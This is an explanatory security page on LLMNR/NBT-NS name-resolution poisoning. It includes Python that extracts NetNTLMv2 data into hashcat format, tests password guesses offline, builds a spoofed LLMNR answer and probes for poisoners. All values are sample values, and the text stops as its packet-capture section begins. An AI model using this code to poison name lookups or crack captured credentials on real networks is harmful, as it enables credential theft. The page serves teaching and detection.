LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are fallback name-resolution protocols that Windows falls back to when DNS cannot resolve a name. Poisoning those requests means an attacker on the same segment answers the multicast (LLMNR) or broadcast (NBT-NS) lookup, impersonates the requested host, and causes the victim to authenticate to the attacker's machine, leaking NTLM/Negotiate authentication data (server challenge plus client response) that can be captured for offline cracking or relayed in real time.

MITRE ATT&CK ID: T1557.001
1- Quick facts
- Protocols / ports: LLMNR = UDP 5355, NBT-NS = UDP 137.
- LLMNR multicast addresses: IPv4 224.0.0.252, IPv6 ff02::1:3. NBT-NS has no multicast group; it uses the subnet broadcast address.
- Common tools (observed in labs): Responder and Inveigh (poisoner plus hash capture), ntlmrelayx from Impacket (relay).
- Data leaked: Username, domain, workstation name, the server challenge and the NTLMv2 response (NTProofStr + client blob). No plaintext password is sent, and the NTLMv2 response is not the NT hash: it can be cracked offline, or relayed while the session is live, but it cannot be reused for pass-the-hash.
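To make the "data leaked" bullet concrete, the following added example (not from the original page, and not code from Responder or Inveigh) parses the NTLMSSP CHALLENGE (Type 2) and AUTHENTICATE (Type 3) messages a poisoned victim sends, pulls out the fields named above, writes them in the user::domain:challenge:NTProofStr:blob line that Responder stores and hashcat mode 5600 reads, and then performs the offline check a cracker does per password candidate. The user jdoe, domain LAB, workstation WS01, challenge, nonce, timestamp and the 16-byte NT hash are constructed sample values; the NT hash is arbitrary bytes, not derived from any password, so the example needs no MD4 and runs on a stock Python.

```python
import hashlib
import hmac
import struct

NTLMSSP_SIG = b"NTLMSSP\x00"

# Constructed sample values; the NT hash is an arbitrary 16 bytes, not derived from any password.
SAMPLE_USER, SAMPLE_DOMAIN, SAMPLE_WORKSTATION = "jdoe", "LAB", "WS01"
SAMPLE_NT_HASH = bytes.fromhex("0123456789abcdef0123456789abcdef")
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")      # ServerChallenge chosen by the poisoner
SAMPLE_CLIENT_NONCE = bytes.fromhex("8877665544332211")   # ChallengeFromClient
SAMPLE_TIMESTAMP = struct.pack("<Q", 133_000_000_000_000_000)  # FILETIME-style timestamp


def _field(msg: bytes, at: int) -> bytes:
    """Resolve an NTLMSSP Len/MaxLen/Offset descriptor located at byte `at`."""
    length, _maxlen, start = struct.unpack_from("<HHI", msg, at)
    return msg[start:start + length]


def _descriptor(data: bytes, start: int) -> bytes:
    return struct.pack("<HHI", len(data), len(data), start)


def parse_challenge(msg: bytes) -> bytes:
    """CHALLENGE_MESSAGE (Type 2): the 8-byte ServerChallenge sits at offset 24."""
    if msg[:8] != NTLMSSP_SIG or struct.unpack_from("<I", msg, 8)[0] != 2:
        raise ValueError("not an NTLMSSP Type 2 message")
    return msg[24:32]


def parse_authenticate(msg: bytes) -> dict:
    """AUTHENTICATE_MESSAGE (Type 3): descriptors at 12 (LM), 20 (NT), 28 (domain),
    36 (user), 44 (workstation). The NT response is NTProofStr (16 bytes) + blob."""
    if msg[:8] != NTLMSSP_SIG or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLMSSP Type 3 message")
    nt_response = _field(msg, 20)
    return {
        "domain": _field(msg, 28).decode("utf-16-le"),
        "user": _field(msg, 36).decode("utf-16-le"),
        "workstation": _field(msg, 44).decode("utf-16-le"),
        "nt_proof_str": nt_response[:16],   # HMAC-MD5 over server challenge + blob
        "blob": nt_response[16:],           # timestamp, client nonce, AV pairs (target info)
    }


def hashcat_5600_line(server_challenge: bytes, auth: dict) -> str:
    """Responder/hashcat NetNTLMv2 line: user::domain:challenge:NTProofStr:blob."""
    return "{}::{}:{}:{}:{}".format(auth["user"], auth["domain"], server_challenge.hex(),
                                    auth["nt_proof_str"].hex(), auth["blob"].hex())


def ntlmv2_proof(nt_hash: bytes, user: str, domain: str, challenge: bytes, blob: bytes) -> bytes:
    """MS-NLMP 3.3.2: ResponseKeyNT = HMAC-MD5(NT hash, UTF-16LE(upper(user) + domain));
    NTProofStr = HMAC-MD5(ResponseKeyNT, ServerChallenge + blob)."""
    key = hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(key, challenge + blob, hashlib.md5).digest()


def check_guess(nt_hash_guess: bytes, server_challenge: bytes, auth: dict) -> bool:
    """The offline-cracking step: a guessed NT hash is right iff it reproduces the
    captured NTProofStr. Everything else in the formula is in the capture."""
    proof = ntlmv2_proof(nt_hash_guess, auth["user"], auth["domain"], server_challenge, auth["blob"])
    return hmac.compare_digest(proof, auth["nt_proof_str"])


def build_sample_capture() -> tuple:
    """Constructed stand-in for a captured exchange: the poisoner's Type 2 and the
    victim's Type 3, built from the SAMPLE_* values above (no real host or user)."""
    type2 = (NTLMSSP_SIG + struct.pack("<I", 2) + _descriptor(b"", 48)
             + struct.pack("<I", 0x00008202) + SAMPLE_CHALLENGE + b"\x00" * 8 + _descriptor(b"", 48))
    # NTLMv2_CLIENT_CHALLENGE: RespType 1, HiRespType 1, Z(6), time, client nonce, Z(4), AV pairs, Z(4)
    dom = SAMPLE_DOMAIN.encode("utf-16-le")
    av_pairs = struct.pack("<HH", 2, len(dom)) + dom + struct.pack("<HH", 0, 0)  # MsvAvNbDomainName, MsvAvEOL
    blob = (b"\x01\x01" + b"\x00" * 6 + SAMPLE_TIMESTAMP + SAMPLE_CLIENT_NONCE
            + b"\x00" * 4 + av_pairs + b"\x00" * 4)
    nt_response = ntlmv2_proof(SAMPLE_NT_HASH, SAMPLE_USER, SAMPLE_DOMAIN, SAMPLE_CHALLENGE, blob) + blob
    # Payload order follows the descriptor order: LM, NT, domain, user, workstation, session key.
    parts = [b"\x00" * 24, nt_response, dom, SAMPLE_USER.encode("utf-16-le"),
             SAMPLE_WORKSTATION.encode("utf-16-le"), b""]
    descriptors, pos = b"", 88            # 60-byte fixed header + 4 flags + 8 version + 16 MIC
    for part in parts:
        descriptors += _descriptor(part, pos)
        pos += len(part)
    type3 = (NTLMSSP_SIG + struct.pack("<I", 3) + descriptors
             + struct.pack("<I", 0x00008205) + b"\x00" * 24 + b"".join(parts))
    return type2, type3


if __name__ == "__main__":
    t2, t3 = build_sample_capture()
    auth = parse_authenticate(t3)
    print(hashcat_5600_line(parse_challenge(t2), auth))
    print("guess matches:", check_guess(SAMPLE_NT_HASH, parse_challenge(t2), auth))
```

The point of check_guess is the asymmetry the bullet describes: the capture hands the attacker the challenge, the blob and the NTProofStr, so each password candidate costs two HMAC-MD5 operations to test, yet the NT hash itself never crosses the wire and the response cannot be replayed against a different challenge.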
2- How the attack flows
- User tries \\DCC01\share (a typo for a real host name, or the DNS lookup fails).
- Windows issues an LLMNR/NBT-NS query “Who is DCC01?” to the local segment (LLMNR multicast, NBT-NS broadcast).
- Attacker replies first: “I am DCC01, here is my IP.”
- Victim connects to the attacker's IP and performs NTLM authentication over SMB (or HTTP/LDAP, depending on the client that issued the lookup).
- Attacker captures the NTLM exchange: server challenge plus the NTLMv2 response (NTProofStr + blob).
- Attacker either:
- cracks the NTLMv2 response offline (hashcat mode 5600, NetNTLMv2), or
- relays the live authentication to another host (SMB/LDAP relay) to act as the user; this only works against targets that do not require signing.
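The query and poisoned answer from the flow above, built and parsed byte by byte, as an added example that is not part of the original page and is not Responder or Inveigh code. It uses only the Python standard library and the RFC 4795 packet layout (a DNS-style header and question). The host name DCC01 comes from the page; the attacker address 10.0.0.66, the transaction ID and all function names are assumptions. probe_for_poisoner at the end is the classic detection check (ask for a name that cannot exist and see who answers); it needs a live network and is not run offline.

```python
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # RFC 4795 IPv4 multicast group
LLMNR_PORT = 5355
QTYPE_A, QCLASS_IN = 1, 1
FLAG_RESPONSE = 0x8000        # QR bit in the DNS-style LLMNR header

def _encode_name(name: str) -> bytes:
    """Host name -> DNS-style length-prefixed labels, NUL terminated."""
    labels = [bytes([len(p)]) + p.encode("ascii") for p in name.split(".")]
    return b"".join(labels) + b"\x00"

def _decode_name(packet: bytes, offset: int) -> tuple:
    """Decode labels at `offset`, following 0xC0xx compression pointers.
    Returns (name, offset just past the name in the original byte stream)."""
    labels, end = [], None
    while True:
        length = packet[offset]
        if (length & 0xC0) == 0xC0:          # pointer to an earlier copy of the name
            pointer = struct.unpack_from("!H", packet, offset)[0] & 0x3FFF
            end = end if end is not None else offset + 2
            offset = pointer
            continue
        offset += 1
        if length == 0:
            break
        labels.append(packet[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if end is not None else offset)

def build_query(name: str, txid: int) -> bytes:
    """What the victim multicasts: ID, flags=0, QDCOUNT=1, then one A question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + _encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)

def parse_query(packet: bytes) -> dict:
    """What a listener (or Wireshark) sees: the ID and the name being asked for."""
    txid, flags, qdcount = struct.unpack_from("!HHH", packet, 0)
    name, offset = _decode_name(packet, 12)
    qtype, qclass = struct.unpack_from("!HH", packet, offset)
    return {"txid": txid, "is_response": bool(flags & FLAG_RESPONSE),
            "name": name, "qtype": qtype, "qclass": qclass}

def build_poisoned_answer(query: bytes, answer_ip: str, ttl: int = 30) -> bytes:
    """The poisoner's reply: same ID, QR set, question echoed, one A record that
    points the name at `answer_ip`. A real poisoner unicasts this back to the
    victim's source port; here it is only built."""
    q = parse_query(query)
    header = struct.pack("!HHHHHH", q["txid"], FLAG_RESPONSE, 1, 1, 0, 0)
    question = _encode_name(q["name"]) + struct.pack("!HH", q["qtype"], q["qclass"])
    answer = (struct.pack("!H", 0xC00C)                 # pointer to the question name at offset 12
              + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
              + socket.inet_aton(answer_ip))
    return header + question + answer

def parse_answer(packet: bytes) -> dict:
    """Extract the (name, IP) pairs a responder claims from an LLMNR reply."""
    txid, flags, qdcount, ancount = struct.unpack_from("!HHHH", packet, 0)
    offset = 12
    for _ in range(qdcount):                          # skip the echoed question(s)
        _, offset = _decode_name(packet, offset)
        offset += 4
    answers = []
    for _ in range(ancount):
        name, offset = _decode_name(packet, offset)
        rtype, rclass, ttl, rdlen = struct.unpack_from("!HHIH", packet, offset)
        offset += 10
        rdata, offset = packet[offset:offset + rdlen], offset + rdlen
        if rtype == QTYPE_A and rdlen == 4:
            answers.append((name, socket.inet_ntoa(rdata)))
    return {"txid": txid, "is_response": bool(flags & FLAG_RESPONSE), "answers": answers}

def probe_for_poisoner(bogus_name: str = "zz-no-such-host", timeout: float = 2.0) -> list:
    """Detection check (needs a live network, not exercised offline): ask for a name
    that cannot exist. Any host that answers is spoofing LLMNR on this segment."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_query(bogus_name, 0x1234), (LLMNR_GROUP, LLMNR_PORT))
    hits = []
    try:
        while True:
            data, (src, _port) = sock.recvfrom(4096)
            hits.append((src, parse_answer(data)["answers"]))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return hits

if __name__ == "__main__":
    # Constructed sample exchange: victim asks for DCC01, poisoner claims 10.0.0.66.
    victim_query = build_query("DCC01", 0xBEEF)
    poisoned = build_poisoned_answer(victim_query, "10.0.0.66")
    print(parse_query(victim_query))
    print(parse_answer(poisoned))
```

Two details matter for the attack and for detection. The poisoner must echo the victim's transaction ID, which is why it answers the query it just heard rather than blindly advertising a name; and nothing in the protocol authenticates the answer, so the first reply wins, which is exactly what probe_for_poisoner exploits in reverse.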
3- What you see in network captures (Wireshark / PCAP)
- LLMNR queries: Wireshark display filter llmnr, or udp.port == 5355.